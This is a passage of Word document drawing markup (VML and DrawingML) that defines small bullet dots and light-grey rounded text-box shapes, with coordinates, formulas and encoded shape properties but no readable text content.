                            <a:gd name="T39" fmla="*/ 29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66605" id="Freeform 379" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:12.1pt;width:2.45pt;height:2.45pt;z-index:-1553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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,184785;13335,184785;11430,184150;0,171450;0,167005;13335,153670;17780,153670;31115,168910;31115,171450;17780,18478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7779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107315</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="633095" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="375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169"/>
                          <a:chExt cx="997" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="376" name="Freeform 378"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="169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351 169"/>
                              <a:gd name="T3" fmla="*/ 351 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 997"/>
                              <a:gd name="T6" fmla="+- 0 351 169"/>
                              <a:gd name="T7" fmla="*/ 351 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 997"/>
                              <a:gd name="T10" fmla="+- 0 351 169"/>
                              <a:gd name="T11" fmla="*/ 351 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 997"/>
                              <a:gd name="T14" fmla="+- 0 330 169"/>
                              <a:gd name="T15" fmla="*/ 330 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 997"/>
                              <a:gd name="T18" fmla="+- 0 327 169"/>
                              <a:gd name="T19" fmla="*/ 327 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 997"/>
                              <a:gd name="T22" fmla="+- 0 190 169"/>
                              <a:gd name="T23" fmla="*/ 190 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 997"/>
                              <a:gd name="T26" fmla="+- 0 169 169"/>
                              <a:gd name="T27" fmla="*/ 169 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2906 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 997"/>
                              <a:gd name="T30" fmla="+- 0 169 169"/>
                              <a:gd name="T31" fmla="*/ 169 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2927 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 997"/>
                              <a:gd name="T34" fmla="+- 0 190 169"/>
                              <a:gd name="T35" fmla="*/ 190 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2927 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 997"/>
                              <a:gd name="T38" fmla="+- 0 330 169"/>
                              <a:gd name="T39" fmla="*/ 330 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2909 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 997"/>
                              <a:gd name="T42" fmla="+- 0 351 169"/>
                              <a:gd name="T43" fmla="*/ 351 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2906 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 997"/>
                              <a:gd name="T46" fmla="+- 0 351 169"/>
                              <a:gd name="T47" fmla="*/ 35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9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6" o:spid="_x0000_s2022" style="position:absolute;margin-left:96.5pt;margin-top:8.45pt;width:49.85pt;height:9.15pt;z-index:-15538688;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,169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">
                <v:shape id="Freeform 378" o:spid="_x0000_s2023" style="position:absolute;left:1930;top:169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wPwcYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KEXopuVLBtdBPEUOjBCrX2/sw+&#10;k2D2bcxuYvrv3UKhx2FmvmHW6WBq0VPrKssKZtMIBHFudcWFguPX2+QFhPPIGmvLpOCHHKTJ6GGN&#10;sbY3/qT+4AsRIOxiVFB638RSurwkg25qG+LgnW1r0AfZFlK3eAtwU8t5FC2lwYrDQokNbUvKL4fO&#10;KPi4vsosqy+bp/3u3Lnu9H1a6JlSj+NhswLhafD/4b/2u1aweF7C75lwBGR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wPwcYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m976,182r-955,l18,182,,161r,-3l,21,21,,976,r21,21l997,161r-18,21l976,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="976,351;21,351;18,351;0,330;0,327;0,190;21,169;976,169;997,190;997,330;979,351;976,351" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 377" o:spid="_x0000_s2024" type="#_x0000_t202" style="position:absolute;left:1930;top:169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XUB8YA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVvNVNK6hN3YgUBUEojemhx9fs&#10;M1mSfRuzq8Z/7xYKHoeZ+YZZLAfbijP13jhW8DJOQBCXThuuFHwXm+c5CB+QNbaOScGVPCyzx4cF&#10;ptpdOKfzPlQiQtinqKAOoUul9GVNFv3YdcTRO7jeYoiyr6Tu8RLhtpWvSTKVFg3HhRo7+qipbPYn&#10;q2D1w/naHD9/v/JDboriLeHdtFFq9DSs3kEEGsI9/N/eagWT2Qz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/XUB8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7830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369570</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="374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631 582"/>
                            <a:gd name="T3" fmla="*/ 631 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 631 582"/>
                            <a:gd name="T7" fmla="*/ 631 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 630 582"/>
                            <a:gd name="T11" fmla="*/ 630 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 610 582"/>
                            <a:gd name="T15" fmla="*/ 610 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 603 582"/>
                            <a:gd name="T19" fmla="*/ 603 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 582 582"/>
                            <a:gd name="T23" fmla="*/ 582 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 582 582"/>
                            <a:gd name="T27" fmla="*/ 582 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 607 582"/>
                            <a:gd name="T31" fmla="*/ 607 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 610 582"/>
                            <a:gd name="T35" fmla="*/ 610 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 631 582"/>
                            <a:gd name="T39" fmla="*/ 63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933A6" id="Freeform 375" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:29.1pt;width:2.45pt;height:2.45pt;z-index:-1553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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,25r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,400685;13335,400685;11430,400050;0,387350;0,382905;13335,369570;17780,369570;31115,385445;31115,387350;17780,40068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7881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323215</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="363220" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="371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16205"/>
                          <a:chOff x="1930" y="509"/>
                          <a:chExt cx="572" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="372" name="Freeform 374"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="509"/>
                            <a:ext cx="572" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2480 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 572"/>
                              <a:gd name="T2" fmla="+- 0 692 509"/>
                              <a:gd name="T3" fmla="*/ 692 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 572"/>
                              <a:gd name="T6" fmla="+- 0 692 509"/>
                              <a:gd name="T7" fmla="*/ 692 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 572"/>
                              <a:gd name="T10" fmla="+- 0 691 509"/>
                              <a:gd name="T11" fmla="*/ 691 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 572"/>
                              <a:gd name="T14" fmla="+- 0 671 509"/>
                              <a:gd name="T15" fmla="*/ 671 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 572"/>
                              <a:gd name="T18" fmla="+- 0 667 509"/>
                              <a:gd name="T19" fmla="*/ 667 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 572"/>
                              <a:gd name="T22" fmla="+- 0 530 509"/>
                              <a:gd name="T23" fmla="*/ 530 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 572"/>
                              <a:gd name="T26" fmla="+- 0 509 509"/>
                              <a:gd name="T27" fmla="*/ 509 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2480 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 572"/>
                              <a:gd name="T30" fmla="+- 0 509 509"/>
                              <a:gd name="T31" fmla="*/ 509 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2501 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 572"/>
                              <a:gd name="T34" fmla="+- 0 530 509"/>
                              <a:gd name="T35" fmla="*/ 530 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2501 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 572"/>
                              <a:gd name="T38" fmla="+- 0 671 509"/>
                              <a:gd name="T39" fmla="*/ 671 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2483 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 572"/>
                              <a:gd name="T42" fmla="+- 0 691 509"/>
                              <a:gd name="T43" fmla="*/ 691 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2480 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 572"/>
                              <a:gd name="T46" fmla="+- 0 692 509"/>
                              <a:gd name="T47" fmla="*/ 69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2" h="183">
                                <a:moveTo>
                                  <a:pt x="55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50" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="571" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="571" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="553" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="55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09"/>
                            <a:ext cx="57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2" o:spid="_x0000_s2025" style="position:absolute;margin-left:96.5pt;margin-top:25.45pt;width:28.6pt;height:9.15pt;z-index:-15537664;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,509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">
                <v:shape id="Freeform 374" o:spid="_x0000_s2026" style="position:absolute;left:1930;top:509;width:572;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="57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GfgscA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE74V+h+UVeqsbtVSNriJSbb3VPxR6e2af&#10;SUj2bbq7jem3dwsFj8PM/IaZLTpTi5acLy0r6PcSEMSZ1SXnCo6H9dMYhA/IGmvLpOCXPCzm93cz&#10;TLW98I7afchFhLBPUUERQpNK6bOCDPqebYijd7bOYIjS5VI7vES4qeUgSV6kwZLjQoENrQrKqv2P&#10;UVBthu336OOrOU0+39yzzqutWb8q9fjQLacgAnXhFv5vv2sFw9EA/s7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Bn4LHAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m550,183r-529,l18,182,,162r,-4l,21,21,,550,r21,21l571,162r-18,20l550,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="550,692;21,692;18,691;0,671;0,667;0,530;21,509;550,509;571,530;571,671;553,691;550,692" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 373" o:spid="_x0000_s2027" type="#_x0000_t202" style="position:absolute;left:1930;top:509;width:5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7SBMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3upGBbXRVUQsFARpTA89vmaf&#10;yWL2bcxuNf57tyB4HGbmG2ax6mwtLtR641jBcJCAIC6cNlwq+M4/3mYgfEDWWDsmBTfysFr2XhaY&#10;anfljC6HUIoIYZ+igiqEJpXSFxVZ9APXEEfv6FqLIcq2lLrFa4TbWo6SZCItGo4LFTa0qag4Hf6s&#10;gvUPZ1tz3v9+ZcfM5Pl7wrvJSanXfreegwjUhWf40f7UCsbT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ztIE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7932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593725</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="370" name="Freeform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983 935"/>
                            <a:gd name="T3" fmla="*/ 983 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 983 935"/>
                            <a:gd name="T7" fmla="*/ 983 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 983 935"/>
                            <a:gd name="T11" fmla="*/ 983 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 962 935"/>
                            <a:gd name="T15" fmla="*/ 962 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 956 935"/>
                            <a:gd name="T19" fmla="*/ 956 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 935 935"/>
                            <a:gd name="T23" fmla="*/ 935 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 935 935"/>
                            <a:gd name="T27" fmla="*/ 935 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 959 935"/>
                            <a:gd name="T31" fmla="*/ 959 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 962 935"/>
                            <a:gd name="T35" fmla="*/ 962 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 983 935"/>
                            <a:gd name="T39" fmla="*/ 983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BAE46" id="Freeform 371" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:46.75pt;width:2.45pt;height:2.45pt;z-index:-1553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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,624205;13335,624205;11430,624205;0,610870;0,607060;13335,593725;17780,593725;31115,608965;31115,610870;17780,62420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7984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547370</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="417195" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="367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1930" y="862"/>
                          <a:chExt cx="657" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="368" name="Freeform 370"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="861"/>
                            <a:ext cx="657" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2565 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 657"/>
                              <a:gd name="T2" fmla="+- 0 1044 862"/>
                              <a:gd name="T3" fmla="*/ 1044 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 657"/>
                              <a:gd name="T6" fmla="+- 0 1044 862"/>
                              <a:gd name="T7" fmla="*/ 1044 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 657"/>
                              <a:gd name="T10" fmla="+- 0 1043 862"/>
                              <a:gd name="T11" fmla="*/ 1043 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 657"/>
                              <a:gd name="T14" fmla="+- 0 1023 862"/>
                              <a:gd name="T15" fmla="*/ 1023 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 657"/>
                              <a:gd name="T18" fmla="+- 0 1020 862"/>
                              <a:gd name="T19" fmla="*/ 1020 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 657"/>
                              <a:gd name="T22" fmla="+- 0 883 862"/>
                              <a:gd name="T23" fmla="*/ 883 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 657"/>
                              <a:gd name="T26" fmla="+- 0 862 862"/>
                              <a:gd name="T27" fmla="*/ 862 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2565 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 657"/>
                              <a:gd name="T30" fmla="+- 0 862 862"/>
                              <a:gd name="T31" fmla="*/ 862 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2586 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 657"/>
                              <a:gd name="T34" fmla="+- 0 883 862"/>
                              <a:gd name="T35" fmla="*/ 883 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2586 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 657"/>
                              <a:gd name="T38" fmla="+- 0 1023 862"/>
                              <a:gd name="T39" fmla="*/ 1023 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2568 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 657"/>
                              <a:gd name="T42" fmla="+- 0 1043 862"/>
                              <a:gd name="T43" fmla="*/ 1043 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2565 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 657"/>
                              <a:gd name="T46" fmla="+- 0 1044 862"/>
                              <a:gd name="T47" fmla="*/ 104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35" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="656" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="656" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="638" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="63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861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8" o:spid="_x0000_s2028" style="position:absolute;margin-left:96.5pt;margin-top:43.1pt;width:32.85pt;height:9.15pt;z-index:-15536640;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,862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">
                <v:shape id="Freeform 370" o:spid="_x0000_s2029" style="position:absolute;left:1930;top:861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4B5sIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+D/wfwhN2WxM7cF1nFBkMHN0OVgc7Pppn&#10;W2xeShNt998vB8Hjx/d7tZlsJ640+NaxhkWiQBBXzrRcazgePp4yED4gG+wck4Y/8rBZzx5WmBs3&#10;8p6uZahFDGGfo4YmhD6X0lcNWfSJ64kjd3KDxRDhUEsz4BjDbSdTpZbSYsuxocGe3huqzuXFaghl&#10;9qNSX9ka1ZcvvtPi8/f1RevH+bR9AxFoCnfxzb0zGp6XcW08E4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HgHmwgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m635,182r-614,l18,181,,161r,-3l,21,21,,635,r21,21l656,161r-18,20l635,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="635,1044;21,1044;18,1043;0,1023;0,1020;0,883;21,862;635,862;656,883;656,1023;638,1043;635,1044" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 369" o:spid="_x0000_s2030" type="#_x0000_t202" style="position:absolute;left:1930;top:861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9zM8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/KE3nSjhVBTV5GiIBSKMR48vmaf&#10;yWL2bcyumv77rlDwOMzMN8x82dtG3KjzxrGCyTgBQVw6bbhScCg2o3cQPiBrbByTgl/ysFy8DOaY&#10;aXfnnG77UIkIYZ+hgjqENpPSlzVZ9GPXEkfv5DqLIcqukrrDe4TbRk6TJJUWDceFGlv6rKk8769W&#10;werI+dpcvn92+Sk3RTFL+Cs9K/U67FcfIAL14Rn+b2+1grd0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/3Mz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8035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809625</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="366" name="Freeform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323 1275"/>
                            <a:gd name="T3" fmla="*/ 1323 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 1323 1275"/>
                            <a:gd name="T7" fmla="*/ 1323 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 1323 1275"/>
                            <a:gd name="T11" fmla="*/ 1323 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 1302 1275"/>
                            <a:gd name="T15" fmla="*/ 1302 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 1296 1275"/>
                            <a:gd name="T19" fmla="*/ 1296 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 1275 1275"/>
                            <a:gd name="T23" fmla="*/ 1275 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 1275 1275"/>
                            <a:gd name="T27" fmla="*/ 1275 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 1299 1275"/>
                            <a:gd name="T31" fmla="*/ 1299 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 1302 1275"/>
                            <a:gd name="T35" fmla="*/ 1302 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 1323 1275"/>
                            <a:gd name="T39" fmla="*/ 1323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1F9D2" id="Freeform 367" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:63.75pt;width:2.45pt;height:2.45pt;z-index:-15536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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,840105;13335,840105;11430,840105;0,826770;0,822960;13335,809625;17780,809625;31115,824865;31115,826770;17780,84010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8086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763270</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="471170" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="363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1202"/>
                          <a:chExt cx="742" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="364" name="Freeform 366"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="1201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1384 1202"/>
                              <a:gd name="T3" fmla="*/ 1384 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 742"/>
                              <a:gd name="T6" fmla="+- 0 1384 1202"/>
                              <a:gd name="T7" fmla="*/ 1384 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 742"/>
                              <a:gd name="T10" fmla="+- 0 1384 1202"/>
                              <a:gd name="T11" fmla="*/ 1384 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 742"/>
                              <a:gd name="T14" fmla="+- 0 1363 1202"/>
                              <a:gd name="T15" fmla="*/ 1363 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 742"/>
                              <a:gd name="T18" fmla="+- 0 1360 1202"/>
                              <a:gd name="T19" fmla="*/ 1360 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 742"/>
                              <a:gd name="T22" fmla="+- 0 1223 1202"/>
                              <a:gd name="T23" fmla="*/ 1223 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 742"/>
                              <a:gd name="T26" fmla="+- 0 1202 1202"/>
                              <a:gd name="T27" fmla="*/ 1202 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2650 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 742"/>
                              <a:gd name="T30" fmla="+- 0 1202 1202"/>
                              <a:gd name="T31" fmla="*/ 1202 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2671 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 742"/>
                              <a:gd name="T34" fmla="+- 0 1223 1202"/>
                              <a:gd name="T35" fmla="*/ 1223 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2671 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 742"/>
                              <a:gd name="T38" fmla="+- 0 1363 1202"/>
                              <a:gd name="T39" fmla="*/ 1363 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2653 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 742"/>
                              <a:gd name="T42" fmla="+- 0 1384 1202"/>
                              <a:gd name="T43" fmla="*/ 1384 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2650 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 742"/>
